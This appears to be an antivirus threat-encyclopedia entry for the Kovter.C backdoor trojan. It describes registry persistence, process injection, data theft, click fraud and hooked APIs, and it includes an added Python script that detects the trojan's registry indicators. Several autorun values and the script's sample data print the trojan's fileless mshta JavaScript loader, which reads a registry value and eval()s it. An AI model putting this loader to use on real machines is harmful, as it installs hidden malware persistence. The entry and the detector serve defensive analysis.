Win32/Kovter [Threat Name]

Win32/Kovter.C [Threat Variant Name]

Category trojan
Size 311860 B
Detection created May 23, 2015
Signature database version 11674
Aliases Trojan.Win32.Kovter.kj (Kaspersky)
  Trojan.MulDrop6.7552 (Dr.Web)
  TR/Kovter.311854 (Avira)
Short description

The trojan serves as a backdoor. It can be controlled remotely.

Installation

The following Registry entries are set:

  • [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    • "0x9a352a44" = "mshta javascript:Wwc4UYPy="q3bAi0T";p3a=new%20ActiveXObject("WScript.Shell");Y5VbU4ym="6fGo";Vuy24U=p3a.RegRead("HKLM\\software\\%variable1%\\%variable2%");yj2AV2YXX="4iWRAuYOY";eval(Vuy24U);QIb3FlghU="tU6";"
  • [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    • "0x9a352a44" = "mshta javascript:Wwc4UYPy="q3bAi0T";p3a=new%20ActiveXObject("WScript.Shell");Y5VbU4ym="6fGo";Vuy24U=p3a.RegRead("HKCU\\software\\%variable1%\\%variable2%");yj2AV2YXX="4iWRAuYOY";eval(Vuy24U);QIb3FlghU="tU6";"
  • [HKEY_LOCAL_MACHINE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
    • "0x9a352a44" = "mshta javascript:Wwc4UYPy="q3bAi0T";p3a=new%20ActiveXObject("WScript.Shell");Y5VbU4ym="6fGo";Vuy24U=p3a.RegRead("HKLM\\software\\%variable1%\\%variable2%");yj2AV2YXX="4iWRAuYOY";eval(Vuy24U);QIb3FlghU="tU6";"
  • [HKEY_CURRENT_USER\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
    • "0x9a352a44" = "mshta javascript:Wwc4UYPy="q3bAi0T";p3a=new%20ActiveXObject("WScript.Shell");Y5VbU4ym="6fGo";Vuy24U=p3a.RegRead("HKCU\\software\\%variable1%\\%variable2%");yj2AV2YXX="4iWRAuYOY";eval(Vuy24U);QIb3FlghU="tU6";"
  • [HKEY_LOCAL_MACHINE\SOFTWARE\%variable1%]
    • "%variable2%" = "%javascriptpayload%"
    • "%variable3%" = "%malwarepayload%"
  • [HKEY_CURRENT_USER\SOFTWARE\%variable1%]
    • "%variable2%" = "%javascriptpayload%"
    • "%variable3%" = "%malwarepayload%"

This causes the trojan to be executed on every system start.


The trojan may create copies of itself using the following filenames:

  • %localappdata%\%variable4%\%variable4%.exe
  • %appdata%\%variable4%\%variable4%.exe
  • %windows%\%variable4%\%variable4%.exe
  • %commonappdata%\Microsoft\%variable4%\%variable4%.exe

A string with variable content is used instead of %variable1-4%.


The trojan may set the following Registry entries:

  • [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    • "0x9a352a44" = "%malwareinstallpath%"
  • [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    • "0x9a352a44" = "%malwareinstallpath%"
  • [HKEY_LOCAL_MACHINE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
    • "0x9a352a44" = "%malwareinstallpath%"
  • [HKEY_CURRENT_USER\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
    • "0x9a352a44" = "%malwareinstallpath%"

This causes the trojan to be executed on every system start.


After the installation is complete, the trojan deletes the original executable file.


The trojan launches the following processes:

  • regsvr32.exe
  • %windir%\System32\regsvr32.exe
  • rundll32.exe
  • %windir%\System32\rundll32.exe
  • explorer.exe
  • %windir%\explorer.exe
  • %malwarefilepath%

The trojan creates and runs a new thread with its own code within these running processes.


The following Registry entries are set:

  • [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
    • "1206" = 0
    • "1809" = 3
    • "2300" = 0
  • [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
    • "1206" = 0
    • "1809" = 3
    • "2300" = 0
  • [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
    • "%malwarefilename%" = 8888
    • "iexplore.exe" = 8888
  • [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
    • "%malwarefilename%" = 8888
    • "iexplore.exe" = 8888

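
The two registry patterns in this entry that a triage script can check for are the autorun values above (an mshta "javascript:" one-liner that RegRead()s a second registry value and eval()s it, so no script file touches disk) and the Internet Settings zone values and FEATURE_BROWSER_EMULATION = 8888 entries just listed. The following Python is an added example, not ESET's code and not part of this entry: it scans a snapshot of (key, value name, data) triples such as a registry collection script would export and reports matches. The snapshot at the bottom is constructed for the example, and the key names d4f1c9 and a7e2 standing in for %variable1%/%variable2% are invented.

```python
"""Registry-snapshot triage for the Kovter.C autorun loader and IE settings.

Added example, not part of the ESET entry. It expects (key, name, data)
triples as a collection script would export them and flags:
  * autorun values that launch mshta with a javascript: URI which RegRead()s
    a second registry value and eval()s it (the fileless loader above);
  * the Internet Settings zone values and FEATURE_BROWSER_EMULATION = 8888
    entries listed above.
The snapshot at the bottom is constructed; d4f1c9 and a7e2 are invented names.
"""
import re
from typing import List, NamedTuple, Optional
from urllib.parse import unquote


class RegValue(NamedTuple):
    key: str   # full key path, e.g. HKEY_CURRENT_USER\Software\...\Run
    name: str  # value name
    data: str  # value data rendered as text (REG_DWORD as decimal)


class Finding(NamedTuple):
    kind: str
    key: str
    name: str
    detail: str


# Both autorun locations from the entry; hive prefix and SOFTWARE component vary.
AUTORUN_KEY = re.compile(r"\\CurrentVersion\\(?:Policies\\Explorer\\)?Run$", re.I)
ZONE_KEY = re.compile(r"\\Internet Settings\\Zones\\\d+$", re.I)
EMULATION_KEY = re.compile(r"\\FeatureControl\\FEATURE_BROWSER_EMULATION$", re.I)

# Zone values as the trojan sets them. 1809 is "Use Pop-up Blocker"; 3 = disabled.
ZONE_VALUES_SET_BY_KOVTER = {"1206": "0", "1809": "3", "2300": "0"}

MSHTA_JS = re.compile(r'^\s*"?(?:[a-z]:\\[^"]*\\)?mshta(?:\.exe)?"?\s+javascript:', re.I)
REGREAD_CALL = re.compile(r"RegRead\(\s*([\"'])(.+?)\1\s*\)", re.I)
EVAL_CALL = re.compile(r"\beval\s*\(", re.I)


def js_registry_source(data: str) -> Optional[str]:
    """Return the registry path an mshta javascript: one-liner reads and
    eval()s, or None if `data` is not that pattern. JS backslash escapes
    are collapsed so the result is a plain registry path."""
    if not MSHTA_JS.match(data):
        return None
    script = unquote(data.split("javascript:", 1)[1])  # %20 -> space
    m = REGREAD_CALL.search(script)
    if m is None or EVAL_CALL.search(script) is None:
        return None
    return m.group(2).replace("\\\\", "\\")


def scan(snapshot: List[RegValue]) -> List[Finding]:
    """Walk the snapshot once and return every entry matching the indicators."""
    findings: List[Finding] = []
    for v in snapshot:
        if AUTORUN_KEY.search(v.key):
            source = js_registry_source(v.data)
            if source is not None:
                findings.append(Finding("fileless-autorun", v.key, v.name,
                                        f"mshta javascript: loader eval()s {source}"))
            elif re.search(r"\bmshta\b", v.data, re.I):
                findings.append(Finding("mshta-autorun", v.key, v.name,
                                        "mshta in an autorun value"))
        elif ZONE_KEY.search(v.key):
            if ZONE_VALUES_SET_BY_KOVTER.get(v.name) == str(v.data):
                findings.append(Finding("ie-zone-weakened", v.key, v.name,
                                        f"{v.name} = {v.data}"))
        elif EMULATION_KEY.search(v.key) and str(v.data) == "8888":
            findings.append(Finding("browser-emulation", v.key, v.name,
                                    "FEATURE_BROWSER_EMULATION = 8888 (forced IE8 mode)"))
    return findings


# Constructed snapshot: one Kovter-style loader, one benign autorun, and the
# zone/emulation values from the entry next to values that must not fire.
RUN = r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
ZONES = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones"
EMU = r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION"
SAMPLE_SNAPSHOT = [
    RegValue(RUN, "0x9a352a44",
             'mshta javascript:Wwc4UYPy="q3bAi0T";p3a=new%20ActiveXObject("WScript.Shell");'
             'Vuy24U=p3a.RegRead("HKCU\\\\software\\\\d4f1c9\\\\a7e2");eval(Vuy24U);QIb3FlghU="tU6";'),
    RegValue(RUN, "OneDrive", r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    RegValue(ZONES + r"\3", "1809", "3"),
    RegValue(ZONES + r"\1", "1206", "0"),
    RegValue(ZONES + r"\1", "2300", "1"),
    RegValue(EMU, "iexplore.exe", "8888"),
    RegValue(EMU, "contoso.exe", "11000"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_SNAPSHOT):
        print(f"[{f.kind}] {f.key} :: {f.name} -> {f.detail}")
```

The `fileless-autorun` finding carries the key the loader reads (the %variable1%\%variable2% location from the entry), which is where the JavaScript stage lives; the `%variable3%` value in the same key holds the binary payload, so both should be exported before remediation. The `mshta-autorun` fallback catches mshta autoruns that do not follow the exact RegRead/eval shape and is worth reviewing by hand.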
Information stealing

The trojan collects the following information:

  • malware version
  • operating system version
  • information about the operating system and system settings
  • language settings
  • installed antivirus software
  • installed firewall application
  • memory status
  • CPU information
  • list of running processes
  • computer name
  • user name

The trojan attempts to send gathered information to a remote machine.

Other information

The trojan acquires data and commands from a remote computer or the Internet.


The trojan contains a list of (173) URLs. The HTTP protocol is used.


It can execute the following operations:

  • download files from a remote computer and/or the Internet
  • run executable files
  • send gathered information
  • create Registry entries
  • stop itself for a certain time period

The trojan sends HTTP requests that simulate clicks on banner advertisements, inflate web counter statistics, and so on.


The trojan keeps various information in the following Registry keys:

  • [HKEY_LOCAL_MACHINE\SOFTWARE\%variable%]
  • [HKEY_CURRENT_USER\SOFTWARE\%variable%]

A string with variable content is used instead of %variable%.


The trojan hooks the following Windows APIs:

  • CreateProcessAsUserA (advapi32.dll)
  • CreateProcessAsUserW (advapi32.dll)
  • CreateProcessWithLogonA (advapi32.dll)
  • CreateProcessWithLogonW (advapi32.dll)
  • CreateProcessWithTokenA (advapi32.dll)
  • CreateProcessWithTokenW (advapi32.dll)
  • RegSetValueA (advapi32.dll)
  • RegSetValueExA (advapi32.dll)
  • RegSetValueExW (advapi32.dll)
  • RegSetValueW (advapi32.dll)
  • DirectSoundCreate (dsound.dll)
  • DirectSoundCreate8 (dsound.dll)
  • RectVisible (gdi32.dll)
  • CreateProcessA (kernel32.dll)
  • CreateProcessW (kernel32.dll)
  • OpenProcess (kernel32.dll)
  • WinExec (kernel32.dll)
  • NtOpenProcess (ntdll.dll)
  • NtResumeThread (ntdll.dll)
  • NtCreateProcess (ntdll.dll)
  • NtCreateProcessEx (ntdll.dll)
  • NtSetValueKey (ntdll.dll)
  • CoCreateInstance (ole32.dll)
  • CoCreateInstanceEx (ole32.dll)
  • CoGetClassObject (ole32.dll)
  • SHGetFolderPathW (shell32.dll)
  • SHGetKnownFolderPath (shell32.dll)
  • ShellExecuteA (shell32.dll)
  • ShellExecuteExA (shell32.dll)
  • ShellExecuteExW (shell32.dll)
  • ShellExecuteW (shell32.dll)
  • DialogBoxIndirectParamA (user32.dll)
  • DialogBoxIndirectParamW (user32.dll)
  • DialogBoxParamW (user32.dll)
  • GetFocus (user32.dll)
  • GetForegroundWindow (user32.dll)
  • MessageBoxA (user32.dll)
  • MessageBoxExA (user32.dll)
  • MessageBoxExW (user32.dll)
  • MessageBoxIndirectA (user32.dll)
  • MessageBoxIndirectW (user32.dll)
  • MessageBoxW (user32.dll)
  • PostMessageA (user32.dll)
  • SetWindowsHookExA (user32.dll)
  • SetWindowsHookExW (user32.dll)
  • WindowFromPoint (user32.dll)
  • waveOutWrite (winmm.dll)
  • HttpOpenRequestA (wininet.dll)
  • HttpOpenRequestW (wininet.dll)
  • InternetConnectA (wininet.dll)
  • InternetConnectW (wininet.dll)
  • InternetReadFile (wininet.dll)
  • getaddrinfo (ws2_32.dll)
  • GetAddrInfoExA (wsock32.dll)
  • GetAddrInfoExW (wsock32.dll)
  • GetAddrInfoW (wsock32.dll)
